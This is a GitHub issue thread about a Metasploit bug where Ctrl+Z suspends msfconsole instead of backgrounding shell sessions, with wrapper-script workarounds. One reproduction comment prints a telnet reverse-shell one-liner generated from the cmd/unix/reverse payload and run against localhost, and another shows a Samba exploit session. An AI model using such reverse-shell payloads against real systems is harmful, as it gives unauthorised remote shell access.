Metasploit-framework: Cannot background command shell (non-meterpreter payloads)

As a workaround this works:

• make sh file wrapper that catches SIGSTOP where msfconsole is located:

#!/bin/sh
trap "" TSTP
/usr/bin/msfconsole

• save as msfconsole.sh in /usr/bin/ directory
• chmod +x msfconsole.sh

I think this can be closed for now since that was kinda fixed I guess.

This still seems to be happening on with cmd/unix/reverse payload:
Framework: 4.17.2-dev-
Console : 4.17.2-dev-

can reproduce this also for powershell and windows reverse shell payloads on v4.17.4-dev-, also this might depend on desktop manager (specifically got this to happen on LXDE now and Gnome in the past)

@fsacer I tested in gnome desktop manager.

@fsacer Okay so it does background but not in a sense that I could use meterpreter commands,upon reinteracting with session it still goes back to powershell terminal.Only powershell commands work cuz it's only powershell session.

I experienced this issue today. The SIGTSTP signal is not caught. When pushing Ctrl+Z the whole process is put in the background. I can get it back by using fg, and then I can put "y" to put the session in background.

Tested with fish and bash on manjaro linux. Metasploit 4.17.5

msf exploit(linux/samba/is_known_pipename) > sessions -i 1
[*] Starting interaction with 1...

Job 1, 'msfconsole -r login.rc' has stopped

Background session 1? [y/N]  ⏎
micke@Humlan ~/D/E/f/flag_07460> fg
Send job 1, “msfconsole -r login.rc” to foreground
y
msf exploit(linux/samba/is_known_pipename) >

This normally still affects the latest msfconsole version:

msf5 > version
Framework: 5.0.35-dev-
Console  : 5.0.35-dev-

I like the workaround given above, with one tweak:

# cat /usr/local/bin/msfconsole 
#!/bin/sh
trap "" TSTP
/usr/bin/msfconsole "$@"

The "$@" part means arguments given to msfconsole will still apply (background: https://stackoverflow.com/a/4824637/372377). I also gave the wrapper script the same name, but since it's under /usr/local/bin/ (which is earlier in the $PATH) means the wrapper script is called when running msfconsole.

Since this breaks some post-exploitation functionality otherwise (there's no way to exit powershell_shell inside meterpreter, for example, without Ctrl-Z), I'd recommend Rapid7 consider solving in the released versions.

Got the same problem on metasploit v5.0.28-dev on archlinux , I can't background a shell/session with crtl+Z , It's background msfconsole itself.

ok, this may or may not help anyone at this point, but I noticed Ive been having this problem when I open msf with 'msfdb run' and not 'msfconsole'. I opened msf using the console command and it backgrounds the session and not all of Metasploit... just my observation.

Bringing this back from the dead to confirm @buneeflacs comments

If using 'msfdb run' it will fail. Use 'msfconsole' if you intend to use ctrl+z to background your sessions without making modifications to your msfconsole.sh file

I haven't been able to replicate this with msfconsole. I did replicate with msfdb run - however that code doesn't live within metasploit-framework and is currently maintained by Kali:

https://gitlab.com/kalilinux/packages/metasploit-framework/-/blob/911ae0bf28bc34effbc6ff7709aa559d0b3adfbc/debian/extra/msfdb

If there's replication steps for msfconsole this is something I can look into further

As a workaround for backgrounding msfdb run you can add:

#!/bin/sh
trap "" TSTP

To the start of /usr/bin/msfdb, but it will stop you from completely backgrounding msfconsole.

My replication steps for Kali and msfdb run were

Creating the cmd/unix/reverse listener + payload:

sudo msfdb run
use cmd/unix/reverse
set LHOST 127.0.0.1
generate -f raw

to_handler

Copy the stdout payload into a new shell and run it:

$ sh -c '(sleep 3602|telnet 127.0.0.1 4444|while : ; do sh && break; done 2>&1|telnet 127.0.0.1 4444 >/dev/null 2>&1 &)'

Swapping back to the previous shell and interacting with it:

msf5 payload(cmd/unix/reverse) > [*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 22NSKBnp2W9syQws;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "22NSKBnp2W9syQws\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.222.1:4444 -> 192.168.222.130:34418) at 2020-07-29 11:05:08 +0100

msf5 payload(cmd/unix/reverse) > sessions -i 1
[*] Starting interaction with 1...

Attempting to foreground the session:

^Z
[1]+  Stopped                 sudo msfdb run
kali@kali:~$ 
Background session 1? [y/N]  y
bash: y: command not found

kali@kali:~$ 

Well, I'm facing the same problem here running:

Ubuntu 20.04 TLS
MTE: 6.0.18-de-v

I could workaround that jus by switching to a non existent session:

meterpreter > sessions 1
[*] Session 1 is already interactive.
meterpreter > sessions 2
[*] Backgrounding session 1...
[-] Invalid session identifier: 2